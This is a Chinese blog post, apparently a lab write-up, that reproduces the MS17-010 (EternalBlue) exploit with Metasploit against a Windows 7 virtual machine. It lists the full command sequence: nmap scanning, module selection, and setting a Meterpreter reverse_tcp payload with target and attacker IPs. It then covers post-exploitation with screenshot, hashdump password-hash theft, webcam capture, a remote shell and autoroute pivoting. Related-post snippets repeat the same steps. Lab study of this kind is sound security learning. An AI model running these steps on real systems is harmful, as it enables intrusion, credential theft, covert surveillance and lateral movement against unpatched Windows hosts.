复现ms17-010漏洞

原创 已于 2023-05-21 15:18:50 修改 · 627 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #web安全 #学习方法

于 2023-05-20 19:01:28 首次发布
本文详细描述了如何在KaliLinux和Win7环境下复现著名的MS17-010漏洞,包括环境准备、端口扫描、漏洞检测、利用Meterpreter进行攻击,以及执行哈希加密密码获取、网络控制等操作。整个过程揭示了网络安全的重要性以及防御此类漏洞的必要性。

复现ms17-010

复现

条件

1.靶机必须为win8以下
2.靶机必须同攻击机处于相同网段(即倒数第二位相同)。
3.靶机的445端口必须要开启。

环境

虚拟机kali为攻击机,win7虚拟机为靶机。
kali IP:192.168.1.129
win7 IP:192.168.1.128
注意:攻击机和靶机的IP的倒数第二位必须相同,即必须处于相同网段。

操作+效果

1.打开kali并登录,在终端输入登录命令
在这里插入图片描述
2.输入密码"kali"
3.使用kali自带的nmap扫描工具,输入代码进行扫描。

nmap -sS 192.168.1.128(靶机IP)

在这里插入图片描述
在这里插入图片描述
可见目标靶机445端口开放,说明该win7靶机具有成功复现ms17-010的条件。

4.打开漏洞库

msfconsole

在这里插入图片描述
在这里插入图片描述
5.查找ms17-010漏洞

search ms17-010

在这里插入图片描述
在这里插入图片描述
6.使用扫描板块来检查是否真实存在ms17-010漏洞。

use 3

在这里插入图片描述
真正存在

7.查看use 3模块需要修改的参数。

show options

在这里插入图片描述
yes选项是必须要填的,可以看到缺少了RHOSTS
8.设置缺少的相关参数。

set rhosts 192.168.1.128

在这里插入图片描述
9.运行扫描模块

run

在这里插入图片描述
10.使用攻击模块

use 0

在这里插入图片描述
11.查看攻击板块的参数信息

show options

在这里插入图片描述
可见rhosets选项为未设置
12.设置攻击载荷,这里默认为windows/x64/meterpreter/reverse_tcp,然后设置受害者IP,攻击者IP

set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.1.128
set lhost 192.168.1.129

在这里插入图片描述
13.检查参数配置无误后就可以进行攻击了

run

在这里插入图片描述
攻击成功!

让我们来看看“hkl”在干嘛

1.截屏

screenshot

在这里插入图片描述
在这里插入图片描述
2.获取经过哈希加密的密码

hashdump

在这里插入图片描述
3.拍照

webcam_list

webcam_snap

在这里插入图片描述
4.控制靶机的cmd并翻译

shell

chcp 65001

在这里插入图片描述

在这里插入图片描述
5.查看子网

arp -a

在这里插入图片描述
6.返回

exit()

在这里插入图片描述
7.分配网段给我们的攻击机,方便攻击机将靶机作为跳板

run autoroute -s 192.168.8.0/24

在这里插入图片描述
8.返回初始漏洞利用界面

background

在这里插入图片描述

漏洞复现MS17-010漏洞(永恒之蓝)复现
m0_53223419的博客
01-15 495
MS17-010漏洞复现,对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
复现永恒之蓝漏洞ms17-010)(一)复现
wty923的博客
01-12 402
永恒之蓝漏洞复现
ms17-010(永恒之蓝)漏洞复现
Filotimo_的博客
09-25 6277
ms17-010利用的端口是445端口。
MS17-010“永恒之蓝”漏洞复现
longanquan的博客
08-18 461
本来不想写这篇博客的,这个漏洞现在几乎不存在了,只有个别用户实在是不懂安全,至今还在用存在这个漏洞的windows7系统,也没有下载补丁,Windows7系统现在也不更新了,但是也不排除还有一部分忠实粉丝喜欢Windows7这个系统。还有一个原因是因为我上一篇写了“永恒之黑”,对于我这个“强迫症”的人来说,一家人就应该整整齐齐的。简单写写大家看个热闹就行。 “永恒之蓝”是2017年报出来的Windows系统SMB服务的漏洞,影响的系统有Windows7、Windows server 2008。主要是Wind
ms17-010漏洞复现
q996966912的博客
01-23 935
[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell 漏洞复现环境 Kali Linux 2017.03 + Windows 7 sp1 攻击机:Kali Linux (ip:172.16.70.216) 靶机:Windows 7 sp1 (ip:172.16.70.199) 实验流程 ①登录Kali Linux,进入MSF框架,搜索ms17-010代码 ...
ms17-010(永恒之蓝) 漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
渗透测试和复现ms17-010漏洞攻击
Yb528970805的博客
09-15 637
ms17_010 是一种操作系统漏洞,仅影响 Windows系统中的 SMBv1 服务。这个漏洞是由于SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。
网安学习日志01:用kali复现ms17-010漏洞
ydxub的博客
11-22 402
1、打开win7(192.168.239.129)和kali(192.168.239.128)虚拟机,设备网络连接方式:NAT,确保两台虚拟机可以互相通信。3、使用nmap工具对win7 ip进行扫描(nmap 192.168.239.129),确认win7中 445端口开放状态。12、完成攻击后,使用screenshoot指令,可以打印攻击对象(win7)的桌面。2、在kali中ping win7的ip,验证两台虚拟机通信正常。14、通过hashdump指令,可以获取到win7的账号和密码。
如何使用MSF复现MS17-010漏洞
cc
03-27 979
MS17-010(永恒之蓝)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。存在漏洞的主机,只需要开放445端口即可被攻击,获取系统最高权限。
使用kail复现ms17-010漏洞采坑记
qq_39610627的博客
12-28 464
1、实验环境 靶机 : Windows Server 2008 R2 ,开放445端口( Windows防火墙不必关闭)。 攻击机: kail,利用Meterpreter渗透工具漏洞MS17-010永恒之蓝(EternalBlue)漏洞。 2、步骤 a.先利用NMAP探测靶机是否开启了445端口(nmap -sV 192.168.70.136) b.使用kali上漏洞利用工具(采坑1–第一次没有初始化工具,直接使用命令msconsole导致后面利用失败)第一次正确步骤如下: c.利用命令扫描靶机的漏洞
MS17_010永恒之蓝漏洞复现
qq_73722777的博客
12-10 537
使用ms17-010漏洞的一点体会
MS17-010漏洞复现
weixin_43622525的博客
03-07 5165
目录 ms17-010 简介 环境 漏洞复现 msfconsole nmap 漏洞修复 ms17-010 简介 永恒之蓝(MS17-010),他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻
MS17-010漏洞复现+利用
Nove1205的博客
07-22 2591
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
MS17-010(永恒之蓝)漏洞复现及防范措施
qq_57538478的博客
07-26 2330
利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。①SMB简介:是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上。②SMB端口:使用TCP139端口和TCP445端口。
我要复现ms17-010
最新发布
12-02
MS17 - 010是一种影响Windows系统的高危漏洞,以下是复现漏洞的大致过程: #### 环境准备 - **目标机**:选择一个受MS17 - 010漏洞影响的Windows系统版本,如Windows 7、Windows Server 2008 R2等。可以从官方网站https://msdn.itellyou.cn/ 下载win7原装镜像,在虚拟机中安装该系统作为目标机。 - **攻击机**:使用Kali Linux系统作为攻击机,Kali Linux自带了许多用于漏洞测试的工具。 #### 漏洞复现步骤 1. **确认目标机存在漏洞** - 使用Nmap工具扫描目标机,检查是否存在MS17 - 010漏洞。在Kali Linux的终端中执行以下命令: ```bash nmap -sV --script smb-vuln-ms17-010 <目标机IP地址> ``` - 如果扫描结果显示目标机存在MS17 - 010漏洞,会有相应的提示信息。 2. **利用Metasploit框架进行攻击** - 启动Metasploit框架,在Kali Linux终端中输入以下命令: ```bash msfconsole ``` - 在Metasploit中搜索MS17 - 010漏洞利用模块: ```plaintext search ms17-010 ``` - 选择合适的利用模块,例如`exploit/windows/smb/ms17_010_eternalblue`: ```plaintext use exploit/windows/smb/ms17_010_eternalblue ``` - 设置目标机的IP地址: ```plaintext set RHOSTS <目标机IP地址> ``` - 设置攻击的有效载荷,例如`windows/x64/meterpreter/reverse_tcp`: ```plaintext set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` - 设置攻击机的IP地址和端口: ```plaintext set LHOST <攻击机IP地址> set LPORT <监听端口> ``` - 执行攻击: ```plaintext exploit ``` - 如果攻击成功,将获得目标机的Meterpreter会话,可以在该会话中执行各种命令,如查看文件、执行程序等。 ### 注意事项 - 漏洞复现应该在合法的、受控制的环境中进行,未经授权对他人的系统进行漏洞测试是违法的行为。 -复现过程中,要注意对目标机和攻击机的操作,避免造成不必要的损失。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值